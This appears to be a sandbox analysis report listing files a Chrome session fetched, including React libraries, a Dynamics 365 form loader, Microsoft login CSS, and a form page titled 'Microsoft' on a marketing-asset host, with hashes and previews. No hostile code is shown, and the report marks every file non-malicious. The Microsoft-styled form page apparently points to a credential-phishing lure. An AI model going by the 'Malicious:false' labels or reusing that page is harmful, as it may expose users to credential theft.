                                                                                                          SSDEEP:3:YWA16LclKmk/FxUJAu+JfF00QLVkrEIAHfF3BN6qVn:YWA5KV/gJAuke0QarW/RRn
                                                                                                          MD5:023A988D3445B435226F41A3F4D7D445
                                                                                                          SHA1:FBC48E6564A8C61DCFA673D011E01939E69F948A
                                                                                                          SHA-256:7F1BD558EABBFBD6518AC2C952BBB93929B9F4DFDC957C5503A62749E0E28532
                                                                                                          SHA-512:F37CE56431F36B691EC2D895360149FC21C5F37D2D05153A4ED736E66C39222876E669B3CC646BFA40142D3CD9DEF04ED7E69F53C33E849D21BA73A1A738D7A5
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{"send_next_batch_interval": 2.0, "rules": [{"name": "spooners", "value": true}, {"name": "standard", "value": false}]}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65461)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):8082542
                                                                                                          Entropy (8bit):5.822931399874259
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:0MMWJ8XaxOmejn42952VCTfPL9uTHgr2Gbr+wG/5DVojeUxEvnfqA/nhXp91gwVY:Y
                                                                                                          MD5:7D4D297AFFD074DC0FF2265A087C825A
                                                                                                          SHA1:57BEAB2052CDA8E4C0CB0B4793188A92B35602A0
                                                                                                          SHA-256:A35547545A381518BD8EF898C0EBC00ADE76AB3C64426142D158638D5AF135E6
                                                                                                          SHA-512:64570442B7F4D7232F85252EC49CBA85C00D719E3F0AF1DE0BA1603FDB57DF74A4A675E03A6BCAF47A2427676CDE4C9C24B743CF174940B83C8748228B07CA5E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://cxppusa1formui01cdnsa01-endpoint.azureedge.net/eur/FormLoader/FormLoader.bundle.js
                                                                                                          Preview:/*! For license information please see FormLoader.bundle.js.LICENSE.txt */.var d365mktforms;(()=>{var V,U,N={686:function(V,U){var N="undefined"!=typeof self?self:this,Z=function(){function V(){this.fetch=!1,this.DOMException=N.DOMException}return V.prototype=N,new V}();!function(V){!function(U){var N="URLSearchParams"in V,Z="Symbol"in V&&"iterator"in Symbol,R="FileReader"in V&&"Blob"in V&&function(){try{return new Blob,!0}catch(V){return!1}}(),d="FormData"in V,l="ArrayBuffer"in V;if(l)var W=["[object Int8Array]","[object Uint8Array]","[object Uint8ClampedArray]","[object Int16Array]","[object Uint16Array]","[object Int32Array]","[object Uint32Array]","[object Float32Array]","[object Float64Array]"],T=ArrayBuffer.isView||function(V){return V&&W.indexOf(Object.prototype.toString.call(V))>-1};function F(V){if("string"!=typeof V&&(V=String(V)),/[^a-z0-9\-#$%&'*+.^_`|~]/i.test(V))throw new TypeError("Invalid character in header field name");return V.toLowerCase()}function M(V){return"strin
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 371x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):10270
                                                                                                          Entropy (8bit):7.975494224416036
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Q+mqTzNbA4UWL8/F3uFXjZUBswQGPic25sIVhRdu7j3:O8i4FoFKxhc2hRej
                                                                                                          MD5:9F5F16CA20631F0357D50A52B99B2D60
                                                                                                          SHA1:9716675075140C73D41A0F888558BDDD55EF97BA
                                                                                                          SHA-256:7736BE7FACB337645F1BAEB0D8AB7641A62C407B6D59C62DBFE1545B7A8F17B9
                                                                                                          SHA-512:64FE2BF81B486CCA7899A02EFD83CC4DB790C13897DB4E4CB5D5F8160BD3B9039540E5397590177219FEC569D66AD9A422A16357449854700ECAA293EFE80A98
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://image.isu.pub/241224193034-77c097d7eadd36d5a1226b1a395fdd6b/jpg/page_1_thumb_large.jpg
                                                                                                          Preview:RIFF.(..WEBPVP8 .(..0....*s...>Q&.F#.!.".i.p..gn.{.3..(.SV.s.&.o...>..yl....V.R...K.O.O...=.~|.......C..........W...7..........=......;...o.....?....t.q~...........-...]..f.d.....~..!._.?.?.......?..............~K.A.{.........?v...U...u.?.........?....k.m....o.........).m...w.W.....~..U.c.....=....I.!.....G..........Y.U....._..........].S..._..............?....t.......;...>.0...p..L....;-5:.i.4..d...K.s...j.-c.A..1..2.....L......YZ....q.a."/.^.V.....o.+.i$....C8.cL.nV$H/Fg.4.<.T.<..;3...w<f......9....B.....k.....s..+..!?K...T..._..v.cT.......)..Wp........M2...L..@.-...7......R.P...`f......Z...v.~......X.....M.RUW...&.)+rO.....a..-L.<.....{..S0Z~.=...+.....[g".>...9.....:.H.r....>a.!..7.r.....:.dn......&..i."..vg......=.|..C......J.=.W.~?..a...2...($.j.>.1..:.m..rV..:....~...=.y....L..AKjf.].U...3h...T).w....O..B...l~...I..p5D..#O.;3.S.....<h.....2....*......50...p.2..L....S.U..........~U.k=7mU.?[3.....?..F}..Z.....7<..;/...y,.....f}.`.....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2138
                                                                                                          Entropy (8bit):4.650574055321636
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:micaIPU7oeoc8ZslkY04YOPmlgRjNOeFp3jP/PUG9C1CK0QP+B:micaQUMeB8ZsyY7YOPCgRg2jP/2CKvWB
                                                                                                          MD5:ADD8BEB3FE77F36BD318F05EB5C046A0
                                                                                                          SHA1:C9A0F7E92F52BDB5D7A4B9FAF3E24BF55F36F08F
                                                                                                          SHA-256:70A843EB912FEDE312A87A98911B5346D96045809E66D189D01F1FF5EA71961E
                                                                                                          SHA-512:B6E156C79DCC1A9B975C872AC228422106A6D617871FAB4DC0DD250D3F49C761BF9CABB1C58C78507BE00823A0C34A65677F73834B996A2E1F47ABEAE12D156D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://cxppusa1formui01cdnsa01-endpoint.azureedge.net/eur/FormLoader/public/locales/en-us/translation.json
                                                                                                          Preview:{.. "FormFailedToLoad": "Failed to load form",.. "FormFailedToLoadCors": "The form can not be loaded on a domain that hasn't been allowed for external form hosting or there is a network connectivity issue",.. "LearnMore": "Learn more",.. "FormSubmitted": "Form submitted",.. "FormSubmitError": "Error submitting the form",.. "Reload": "Reload",.. "LookupLoading": "loading...",.. "LookupGenericError": "There was a problem retrieving items. Try again later.",.. "ValidationRequiredField": "This field is required",.. "ValidationSessionSelectionRequired": "Please choose at least one session",.. "ValidationSingleSessionSelectionRequired": "Please choose a session",.. "EventFailedToLoad": "Failed to load event.",.. "EventAtCapacity": "The event is full and is not accepting any more sign-ups.",.. "EventNotLive": "We are still setting up this event. Please check again in some time or contact the event organizer ",.. "SubmissionErrorEventNotLive": "Registrations for this event have
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):20410
                                                                                                          Entropy (8bit):7.980582012022051
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                                                          MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                                          SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                                          SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                                          SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                                          Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (519)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2357
                                                                                                          Entropy (8bit):5.2366549496742465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uIAfz8ZVHhUu2v0QBUJZBzEsUZj+JDnX7ara2tAJ9nZZqBqvQrcP2:uIDZU0UUtIvZjEDncOXZ2
                                                                                                          MD5:48CC972B7C94C276216FFA9B76449BB3
                                                                                                          SHA1:25B6F81010F7255DDB7D15AB34DA98D9E460E1B0
                                                                                                          SHA-256:2B9B5850C797BB8B55A0BAFE7A4822CC973ED3730A2E9B138C9F4EB3A36AD1F7
                                                                                                          SHA-512:EE386BD5945719A5BD3EC2A28E6F7CE1FE7612C675E826A51B4127A4CED55199B13142D244CA9A46CEE5E91BA6C7FD20CE042207B641912E697730F00D1E7A71
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/** @license React v17.0.2. * react-is.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(b,d){"object"===typeof exports&&"undefined"!==typeof module?d(exports):"function"===typeof define&&define.amd?define(["exports"],d):(b=b||self,d(b.ReactIs={}))})(this,function(b){function d(a){if("object"===typeof a&&null!==a){var b=a.$$typeof;switch(b){case q:switch(a=a.type,a){case e:case f:case g:case h:case t:return a;default:switch(a=a&&a.$$typeof,a){case k:case l:case m:case n:case p:return a;default:return b}}case r:return b}}}var q=60103,r=60106,e=60107,g=60108,f=60114,.p=60109,k=60110,l=60112,h=60113,t=60120,n=60115,m=60116,u=60121,v=60122,w=60117,x=60129,y=60131;if("function"===typeof Symbol&&Symbol.for){var c=Symbol.for;q=c("react.element");r=c("react.portal");e=c("react.fragment");g=c("react.strict_
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 371x480, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16753
                                                                                                          Entropy (8bit):7.859564332960084
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:1dXNH3Sd11v+UFhlKHbFQ/Jped+i/vKWH9RDsyuY:7J6115hlK5cpeUESW5
                                                                                                          MD5:26141A812BDBEF031F80BB4A0ECC9599
                                                                                                          SHA1:59506C2F3C49F3A17B7D9EBCF4C6807E1C162224
                                                                                                          SHA-256:E07EC6575379C359000F9E43FF259B1816FE060FDEA7876352D8F363AD5504F1
                                                                                                          SHA-512:C723ACD6A5A00385590D2765A40C52A5624B6FEFA425D0F98320B28E54E34981197FB39D6CB0A6EF73EE18D784964F7522DC3ED0BA77F5226023782B16B96951
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........s..".........................................T...........................!1..AQ"2q..RTat.....#56....34BSdr....CUVWbsu..$&%EF.....................................@.......................!..1Q."Aaq...4Sr..23RT..#BC......5cst.............?..D@...DD....D@...DD....D@...DD....D@...DD....D@...DD.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (519)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2357
                                                                                                          Entropy (8bit):5.2366549496742465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uIAfz8ZVHhUu2v0QBUJZBzEsUZj+JDnX7ara2tAJ9nZZqBqvQrcP2:uIDZU0UUtIvZjEDncOXZ2
                                                                                                          MD5:48CC972B7C94C276216FFA9B76449BB3
                                                                                                          SHA1:25B6F81010F7255DDB7D15AB34DA98D9E460E1B0
                                                                                                          SHA-256:2B9B5850C797BB8B55A0BAFE7A4822CC973ED3730A2E9B138C9F4EB3A36AD1F7
                                                                                                          SHA-512:EE386BD5945719A5BD3EC2A28E6F7CE1FE7612C675E826A51B4127A4CED55199B13142D244CA9A46CEE5E91BA6C7FD20CE042207B641912E697730F00D1E7A71
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/react-is/17.0.2/umd/react-is.production.min.js
                                                                                                          Preview:/** @license React v17.0.2. * react-is.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(b,d){"object"===typeof exports&&"undefined"!==typeof module?d(exports):"function"===typeof define&&define.amd?define(["exports"],d):(b=b||self,d(b.ReactIs={}))})(this,function(b){function d(a){if("object"===typeof a&&null!==a){var b=a.$$typeof;switch(b){case q:switch(a=a.type,a){case e:case f:case g:case h:case t:return a;default:switch(a=a&&a.$$typeof,a){case k:case l:case m:case n:case p:return a;default:return b}}case r:return b}}}var q=60103,r=60106,e=60107,g=60108,f=60114,.p=60109,k=60110,l=60112,h=60113,t=60120,n=60115,m=60116,u=60121,v=60122,w=60117,x=60129,y=60131;if("function"===typeof Symbol&&Symbol.for){var c=Symbol.for;q=c("react.element");r=c("react.portal");e=c("react.fragment");g=c("react.strict_
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (605)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):120585
                                                                                                          Entropy (8bit):5.370923647345209
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:6s276dU+/c7hEUuoiwbUgLYUR16SLq959TDqReyDjG9M5nvr2aIgq20PH:12lCy6LSl16S4PTODj+MZDDRs
                                                                                                          MD5:23BFE7E99565EE8F34AFD63C06F4C24B
                                                                                                          SHA1:BF08B8AD1AD73C12A7C9CB211926CE23A861DB07
                                                                                                          SHA-256:9DB33292007AB6C38527B39D5663E976A305564E19B2A5A8713EA2B2C00F505D
                                                                                                          SHA-512:F6318DAF93E2C1EF27CCB2D84E4F10AC430F7E3194D29C7CD066332995318BB96609FAC18EDC827355799244B9BF1570C0807B429CDCED4C4B890C5F00DDF477
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/react-dom/17.0.2/umd/react-dom.production.min.js
                                                                                                          Preview:/** @license React v17.0.2. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(M,ha){"object"===typeof exports&&"undefined"!==typeof module?ha(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],ha):(M=M||self,ha(M.ReactDOM={},M.React))})(this,function(M,ha){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}.function Ta(a,b){gb(a,b);gb(a+"Capture",b)}function gb(a,b){Ib[a]=b;for(a=0;a<b.length;a++)zf.add(b[a])}function li(a){if(Af.call(Bf,a)
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16345
                                                                                                          Entropy (8bit):7.98960525258912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                                                          MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                                                          SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                                                          SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                                                          SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (33730)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):256048
                                                                                                          Entropy (8bit):5.576298036807442
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:/k3HFitgcns2Ijl+D0TzmYasxzuZ1IwPcRCr7Plka0Mf3/I4EmeVM1:/8Yns2QEZ1HcRCr2a0Mf3/I0
                                                                                                          MD5:D33BF0C7F28ACBF3E9A0551EE9FB40DE
                                                                                                          SHA1:A99BE36D55BB09B3C4B5C0B19A561942F0A953BB
                                                                                                          SHA-256:6D3F0234838C119C21520883494B6EA138CDA58795FDED92692A3EA1F7666C05
                                                                                                          SHA-512:56A2908FB8E832B8DFD2DAD3AD88A516330FB9AC11665BF1203104441E164960BA755B8ED7C1E0533373DE5BF0214DE5199C8B9D77CA7EC8BE219E3D8BFB1976
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"279",. . "macros":[{"function":"__e"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=\"CookieConsent\",b=\"|\";if(a=(a=document.cookie.match(\"(^|;) ?\"+a+\"\\x3d([^;]*)(;|$)\"))?a[2]:null)a=a.toLowerCase(),\"-1\"===a?b=\"|preferences|statistics|marketing|necessary|\":(-1\u003Ca.indexOf(\"preferences:true\")\u0026\u0026(b+=\"preferences|\"),-1\u003Ca.indexOf(\"statistics:true\")\u0026\u0026(b+=\"statistics|\"),-1\u003Ca.indexOf(\"marketing:true\")\u0026\u0026(b+=\"marketing|\"),-1\u003Ca.indexOf(\"necessary:true\")\u0026\u0026(b+=\"necessary|\"));return b})();"]},{"function":"__v","vtp_setDefaultValue":true,"vtp_defaultValue":"1","vtp_name":"value_usd"},{"function":"__v","vtp_setDefaultValue":true,"vtp_defaultValue":"notset","vtp_name":"plan"},{"function":
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31
                                                                                                          Entropy (8bit):3.86469832616696
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YBAvZNQaY:YwZNQaY
                                                                                                          MD5:2D7D30EA1C6F925302D2C3ABED382951
                                                                                                          SHA1:5BA6BBC5670C4AF1125CF9AC0AA1CA2811E744D1
                                                                                                          SHA-256:83C09BA9A8DAEDB136F90B17A294CAA90AD471A016E430DF6E229ACB5A81E100
                                                                                                          SHA-512:BCC7AAA8A6A27ADCBD1B3E0FCA73FC1BD727FECEAB34734E99863503D1D50936A8830C0A12D75D187614F318F46B1E67F046E89F5EB6CE727D8433A722E2C525
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{"detail":"Method Not Allowed"}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1048)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):53758
                                                                                                          Entropy (8bit):4.633599209915522
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:SbZuXzUzUrWE2uzu4tWMu7uBVQ4V4iCqaRX7djXlx8IClse69Gxm:CZwUzUxny4oVKBm4uiFMZ3QlsT9H
                                                                                                          MD5:2F4C9C1220626E2B027717467DCA5398
                                                                                                          SHA1:3849A744B5569D6C96DC9CFA9F248B42E0915669
                                                                                                          SHA-256:A80541364FA96092FAAB217116909C9C42F87F8891C67EFFB1FFAE96558B65DC
                                                                                                          SHA-512:DCB6A160846496E9EE2C376832B5D0A61F650592AF5B7C0E5BD63F1AD769A25827B758BF3C3DC780DB2AF90184FFAB0A6B7204ECA8F3E3F85B68E0FD27AFB2B4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29
                                                                                                          Preview:<!DOCTYPE html><html><head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">. <title>Microsoft </title>. <meta name="referrer" content="never">. . <meta type="xrm/designer/setting" name="type" value="marketing-designer-content-editor-document">. <meta type="xrm/designer/setting" name="layout-editable" value="marketing-designer-layout-editable">. <style data-merge-styles="true">. .hide-on-desktop-class {. display: none !important;. }. @media only screen and (max-width: 768px) {. .tbContainer {display: block !important;}. a span {. line-height: inherit !important;. }. .multi table {. table-layout: fixed;.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:gzip compressed data, original size modulo 2^32 155
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):6.621925542861166
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Ftty1kIQxu/lY47OJTpgmbQYpYL8puFkXEeKPM2fNYORZrlT9a/:XtLxuR7OsyQYl0eKPM2yORVfq
                                                                                                          MD5:B8FD3EDB18DBABC46500456060B24FBD
                                                                                                          SHA1:18A74F35E441E8B3514A095AEEE483A1828C8388
                                                                                                          SHA-256:7721360AA2770CD84410D063853ACD548C4855493ED8BBE6DADC539219254A80
                                                                                                          SHA-512:922B444A042F5179C29946E5746C33F871BBA4D91053142A35C5457B17F9402DE7023E03BE6888875B7B2044E07BADC208320BF7C16F9F6AF0F2D1684C937B00
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..........]...P...s.2.V..N.E8. ......`......0.,........L.D......L`,Q".h,.N....TxM.0.+4.#.......St./..P^y.o.tS..)2Qq*...vVn..}#<O...b...?..G..._~.p7.V....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):491
                                                                                                          Entropy (8bit):5.045159006984001
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:s8EODy8//VSOfS4oi2OSkOj/h6BAddIkxMAdb:9R/NhlopOEGAdKkxbb
                                                                                                          MD5:D1B27BE66C8CC6E5161743BFDF10AC5B
                                                                                                          SHA1:45992E19A8AB2BBE4343C27EBBFE34BE98E12FF4
                                                                                                          SHA-256:E7520AEBF64548D8C08371CB9DC7315E86AC029D0AA3A610231B9C897ADA964B
                                                                                                          SHA-512:A0E3217A4C1FBE457D58AF32C2CAA492582C0BFEF617676685C8BC675656D5A0EEEEF00206E217D8E8FE38822580037D47439E058410C1A6B8A9D70CBE2370EE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29
                                                                                                          Preview:<div. data-form-id='afd683a8-7bbc-ef11-b8e9-000d3a43cf29'. data-form-api-url='https://public-eur.mkt.dynamics.com/api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms'. data-cached-form-url='https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29' ></div>. <script src = 'https://cxppusa1formui01cdnsa01-endpoint.azureedge.net/eur/FormLoader/FormLoader.bundle.js' ></script>
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):156
                                                                                                          Entropy (8bit):4.30105367335598
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:xAuHXGHfoKH+8fuITW1fzH3XiLk0XGHfodR8fuITW1fzHVmFsYv:SEc+JVzXX8kudRJVz1Yv
                                                                                                          MD5:0688421B9A7B68EB51E9A8C5F872B0BE
                                                                                                          SHA1:FEC935625A44073463B3E6F5361B5F1A759E337E
                                                                                                          SHA-256:623ED237342283A5FA6E337FA5A7013EEA9EA7DFEC76B95068758031804B6500
                                                                                                          SHA-512:36438F1974A8B0E39E5DAEA47FBAF9BA72921477502B552D1BC68A33D8C050D6D021367E3DA8F54071AA1C9B8DEA2056171F283FD69EE1E9E5A90266BF1BCCCB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://issuu.com/manifest.webmanifest
                                                                                                          Preview:{. "icons": [. { "src": "/192.png", "type": "image/png", "sizes": "192x192" },. { "src": "/512.png", "type": "image/png", "sizes": "512x512" }. ].}.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (544)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):11440
                                                                                                          Entropy (8bit):5.360613902337515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:8cL60YrI90CW3j4xqLYfMHaPsiJcW9eYcfZcTQWhGJykDZNZ3e:9L6hrI90CW3jhgUiJc+eYcfZ3W0JySN0
                                                                                                          MD5:61699B70CF57ABE63FDF5F4007D36EC1
                                                                                                          SHA1:6C05189CC2D08BB2A7609C002F0675C9C670D362
                                                                                                          SHA-256:229BBF4D0E7488209564152C6723497F1AC3934136CA1684233D2FA88FA4146F
                                                                                                          SHA-512:AA5CC8794B5383B781A6611A4B5D8D660C73E766186551799B28FCF668C911EB0177FA04F543EC60E5F64005F3BCE019604BD0A2129D718F33284D3689F5C398
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/react/17.0.2/umd/react.production.min.js
